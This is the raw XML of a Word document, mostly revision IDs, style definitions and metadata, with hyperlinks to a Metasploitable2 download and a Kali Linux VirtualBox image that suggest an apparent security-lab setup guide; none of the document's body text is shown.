    <w:rsid w:val="004E20A5"/>
    <w:rsid w:val="004F2470"/>
    <w:rsid w:val="00507E92"/>
    <w:rsid w:val="00517FB5"/>
    <w:rsid w:val="005221EA"/>
    <w:rsid w:val="005248A4"/>
    <w:rsid w:val="00525CB2"/>
    <w:rsid w:val="005264AA"/>
    <w:rsid w:val="00536ED7"/>
    <w:rsid w:val="005477E8"/>
    <w:rsid w:val="005541AB"/>
    <w:rsid w:val="0056491B"/>
    <w:rsid w:val="0057017F"/>
    <w:rsid w:val="00572BCA"/>
    <w:rsid w:val="00582013"/>
    <w:rsid w:val="0058313E"/>
    <w:rsid w:val="005A68BB"/>
    <w:rsid w:val="005D4D33"/>
    <w:rsid w:val="005E1ED5"/>
    <w:rsid w:val="005E47EB"/>
    <w:rsid w:val="005E6277"/>
    <w:rsid w:val="005F09CD"/>
    <w:rsid w:val="006004D7"/>
    <w:rsid w:val="006005D9"/>
    <w:rsid w:val="00602226"/>
    <w:rsid w:val="00603A40"/>
    <w:rsid w:val="0061570F"/>
    <w:rsid w:val="00626DE2"/>
    <w:rsid w:val="00636F68"/>
    <w:rsid w:val="00646D70"/>
    <w:rsid w:val="006605DF"/>
    <w:rsid w:val="00661067"/>
    <w:rsid w:val="006759ED"/>
    <w:rsid w:val="00677B62"/>
    <w:rsid w:val="00681431"/>
    <w:rsid w:val="00682ADD"/>
    <w:rsid w:val="00687EAF"/>
    <w:rsid w:val="00693889"/>
    <w:rsid w:val="00695822"/>
    <w:rsid w:val="006B3448"/>
    <w:rsid w:val="006B7A33"/>
    <w:rsid w:val="006C0876"/>
    <w:rsid w:val="006D2B53"/>
    <w:rsid w:val="006E4780"/>
    <w:rsid w:val="006F22E8"/>
    <w:rsid w:val="00707F03"/>
    <w:rsid w:val="007230D2"/>
    <w:rsid w:val="007237BA"/>
    <w:rsid w:val="00730B8B"/>
    <w:rsid w:val="007315B3"/>
    <w:rsid w:val="00743D4E"/>
    <w:rsid w:val="00746521"/>
    <w:rsid w:val="00761185"/>
    <w:rsid w:val="007667AD"/>
    <w:rsid w:val="00773734"/>
    <w:rsid w:val="00795DE8"/>
    <w:rsid w:val="0079733C"/>
    <w:rsid w:val="00797950"/>
    <w:rsid w:val="007B0D4D"/>
    <w:rsid w:val="007C265B"/>
    <w:rsid w:val="007D66D4"/>
    <w:rsid w:val="007F55FA"/>
    <w:rsid w:val="007F5E2B"/>
    <w:rsid w:val="007F6CFE"/>
    <w:rsid w:val="00820FD3"/>
    <w:rsid w:val="0082566E"/>
    <w:rsid w:val="00834538"/>
    <w:rsid w:val="00840F39"/>
    <w:rsid w:val="00842D4B"/>
    <w:rsid w:val="008550D0"/>
    <w:rsid w:val="00861F96"/>
    <w:rsid w:val="008731AB"/>
    <w:rsid w:val="008835E6"/>
    <w:rsid w:val="008A2925"/>
    <w:rsid w:val="008A36E3"/>
    <w:rsid w:val="008B0F67"/>
    <w:rsid w:val="008B78B2"/>
    <w:rsid w:val="008D165E"/>
    <w:rsid w:val="008D27B6"/>
    <w:rsid w:val="008D510B"/>
    <w:rsid w:val="008D729A"/>
    <w:rsid w:val="008D73DF"/>
    <w:rsid w:val="008D7F3D"/>
    <w:rsid w:val="008E0ED2"/>
    <w:rsid w:val="008E189B"/>
    <w:rsid w:val="008E4AFB"/>
    <w:rsid w:val="008F3D70"/>
    <w:rsid w:val="0090442E"/>
    <w:rsid w:val="00913ED2"/>
    <w:rsid w:val="0091534D"/>
    <w:rsid w:val="00920BB4"/>
    <w:rsid w:val="00926368"/>
    <w:rsid w:val="00926461"/>
    <w:rsid w:val="00930C11"/>
    <w:rsid w:val="00933326"/>
    <w:rsid w:val="00944681"/>
    <w:rsid w:val="0094742A"/>
    <w:rsid w:val="00964E43"/>
    <w:rsid w:val="00971098"/>
    <w:rsid w:val="00971FAE"/>
    <w:rsid w:val="00977DFA"/>
    <w:rsid w:val="00980A67"/>
    <w:rsid w:val="00986B41"/>
    <w:rsid w:val="009971E8"/>
    <w:rsid w:val="009A2E6F"/>
    <w:rsid w:val="009A5603"/>
    <w:rsid w:val="009A6C20"/>
    <w:rsid w:val="009B0A0B"/>
    <w:rsid w:val="009C5FC2"/>
    <w:rsid w:val="009D2229"/>
    <w:rsid w:val="009D48D3"/>
    <w:rsid w:val="009E42BA"/>
    <w:rsid w:val="009E6961"/>
    <w:rsid w:val="009E6BEC"/>
    <w:rsid w:val="00A162EB"/>
    <w:rsid w:val="00A3533D"/>
    <w:rsid w:val="00A367E3"/>
    <w:rsid w:val="00A47717"/>
    <w:rsid w:val="00A5657F"/>
    <w:rsid w:val="00A56E33"/>
    <w:rsid w:val="00A67568"/>
    <w:rsid w:val="00A703FD"/>
    <w:rsid w:val="00A720CF"/>
    <w:rsid w:val="00A801ED"/>
    <w:rsid w:val="00A87B73"/>
    <w:rsid w:val="00A9072F"/>
    <w:rsid w:val="00AA16C3"/>
    <w:rsid w:val="00AA565A"/>
    <w:rsid w:val="00AB013F"/>
    <w:rsid w:val="00AB02CE"/>
    <w:rsid w:val="00AC0D09"/>
    <w:rsid w:val="00AD4D51"/>
    <w:rsid w:val="00AE4D04"/>
    <w:rsid w:val="00AF3136"/>
    <w:rsid w:val="00AF458E"/>
    <w:rsid w:val="00B00DD4"/>
    <w:rsid w:val="00B2486C"/>
    <w:rsid w:val="00B27310"/>
    <w:rsid w:val="00B2737B"/>
    <w:rsid w:val="00B32E87"/>
    <w:rsid w:val="00B475C0"/>
    <w:rsid w:val="00B539BC"/>
    <w:rsid w:val="00B60093"/>
    <w:rsid w:val="00B60985"/>
    <w:rsid w:val="00B72FC7"/>
    <w:rsid w:val="00B760CD"/>
    <w:rsid w:val="00B8065C"/>
    <w:rsid w:val="00B82BA1"/>
    <w:rsid w:val="00B83919"/>
    <w:rsid w:val="00B83C12"/>
    <w:rsid w:val="00B84C29"/>
    <w:rsid w:val="00B853AA"/>
    <w:rsid w:val="00BA0A34"/>
    <w:rsid w:val="00BA46C9"/>
    <w:rsid w:val="00BA67E1"/>
    <w:rsid w:val="00BB01AC"/>
    <w:rsid w:val="00BB0AA0"/>
    <w:rsid w:val="00BB4DC7"/>
    <w:rsid w:val="00BB4FFC"/>
    <w:rsid w:val="00BB5979"/>
    <w:rsid w:val="00BC0167"/>
    <w:rsid w:val="00BC17C8"/>
    <w:rsid w:val="00BC4C92"/>
    <w:rsid w:val="00BC4F9F"/>
    <w:rsid w:val="00BD2F13"/>
    <w:rsid w:val="00BD5097"/>
    <w:rsid w:val="00BE43D5"/>
    <w:rsid w:val="00BE5858"/>
    <w:rsid w:val="00BE6B7F"/>
    <w:rsid w:val="00BF4077"/>
    <w:rsid w:val="00BF753B"/>
    <w:rsid w:val="00C00C80"/>
    <w:rsid w:val="00C02A64"/>
    <w:rsid w:val="00C05743"/>
    <w:rsid w:val="00C13A11"/>
    <w:rsid w:val="00C15462"/>
    <w:rsid w:val="00C2031F"/>
    <w:rsid w:val="00C2478E"/>
    <w:rsid w:val="00C460BB"/>
    <w:rsid w:val="00C5152A"/>
    <w:rsid w:val="00C51AEA"/>
    <w:rsid w:val="00C66357"/>
    <w:rsid w:val="00C9274A"/>
    <w:rsid w:val="00C93399"/>
    <w:rsid w:val="00CA3308"/>
    <w:rsid w:val="00CB0782"/>
    <w:rsid w:val="00CB573B"/>
    <w:rsid w:val="00CB5C4A"/>
    <w:rsid w:val="00CB74C7"/>
    <w:rsid w:val="00CC4D47"/>
    <w:rsid w:val="00CD0776"/>
    <w:rsid w:val="00CE2612"/>
    <w:rsid w:val="00D13147"/>
    <w:rsid w:val="00D21905"/>
    <w:rsid w:val="00D21BF5"/>
    <w:rsid w:val="00D31BA6"/>
    <w:rsid w:val="00D33C45"/>
    <w:rsid w:val="00D628C1"/>
    <w:rsid w:val="00D7307D"/>
    <w:rsid w:val="00D74376"/>
    <w:rsid w:val="00D83DA8"/>
    <w:rsid w:val="00D970F4"/>
    <w:rsid w:val="00DA7913"/>
    <w:rsid w:val="00DC0F93"/>
    <w:rsid w:val="00DC1D2C"/>
    <w:rsid w:val="00DD6A60"/>
    <w:rsid w:val="00DF179D"/>
    <w:rsid w:val="00E0381F"/>
    <w:rsid w:val="00E03CFA"/>
    <w:rsid w:val="00E04E93"/>
    <w:rsid w:val="00E141C1"/>
    <w:rsid w:val="00E20B75"/>
    <w:rsid w:val="00E26650"/>
    <w:rsid w:val="00E27C92"/>
    <w:rsid w:val="00E34F53"/>
    <w:rsid w:val="00E36889"/>
    <w:rsid w:val="00E36F51"/>
    <w:rsid w:val="00E4324B"/>
    <w:rsid w:val="00E5476E"/>
    <w:rsid w:val="00E6039A"/>
    <w:rsid w:val="00E61836"/>
    <w:rsid w:val="00E61926"/>
    <w:rsid w:val="00E64C59"/>
    <w:rsid w:val="00E70479"/>
    <w:rsid w:val="00E72EEA"/>
    <w:rsid w:val="00E80EE6"/>
    <w:rsid w:val="00E8156E"/>
    <w:rsid w:val="00E85FDB"/>
    <w:rsid w:val="00EA5878"/>
    <w:rsid w:val="00EB2E05"/>
    <w:rsid w:val="00EB37FE"/>
    <w:rsid w:val="00EB5A83"/>
    <w:rsid w:val="00EB6598"/>
    <w:rsid w:val="00EC08D1"/>
    <w:rsid w:val="00EC18D7"/>
    <w:rsid w:val="00EC1B0F"/>
    <w:rsid w:val="00EC5745"/>
    <w:rsid w:val="00EC5E0C"/>
    <w:rsid w:val="00EC789B"/>
    <w:rsid w:val="00ED52F2"/>
    <w:rsid w:val="00EE2E26"/>
    <w:rsid w:val="00EE4C4A"/>
    <w:rsid w:val="00EE7C13"/>
    <w:rsid w:val="00EF58D7"/>
    <w:rsid w:val="00EF696E"/>
    <w:rsid w:val="00F014F8"/>
    <w:rsid w:val="00F02A4A"/>
    <w:rsid w:val="00F111A2"/>
    <w:rsid w:val="00F337B0"/>
    <w:rsid w:val="00F37491"/>
    <w:rsid w:val="00F37E39"/>
    <w:rsid w:val="00F41E9B"/>
    <w:rsid w:val="00F57A30"/>
    <w:rsid w:val="00F645F4"/>
    <w:rsid w:val="00F651C4"/>
    <w:rsid w:val="00F73DE4"/>
    <w:rsid w:val="00F7595A"/>
    <w:rsid w:val="00F8188E"/>
    <w:rsid w:val="00FA0A81"/>
    <w:rsid w:val="00FA21E4"/>
    <w:rsid w:val="00FB71C9"/>
    <w:rsid w:val="00FC12D7"/>
    <w:rsid w:val="00FC2F00"/>
    <w:rsid w:val="00FC6973"/>
    <w:rsid w:val="00FC7F7D"/>
    <w:rsid w:val="00FD3FBE"/>
    <w:rsid w:val="00FD6E85"/>
    <w:rsid w:val="00FE214E"/>
    <w:rsid w:val="00FF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256E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{45F5FA0E-5ACC-46F8-A328-96B2AC68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B9"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00225BB9"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00225BB9"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F37491"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003B5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17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metasploitable/files/Metasploitable2/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kali.download/virtual-images/kali-2022.1/kali-linux-2022.1-virtualbox-amd64.ov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Joyce</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Natarajan Gokul</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-05T15:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-19T03:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>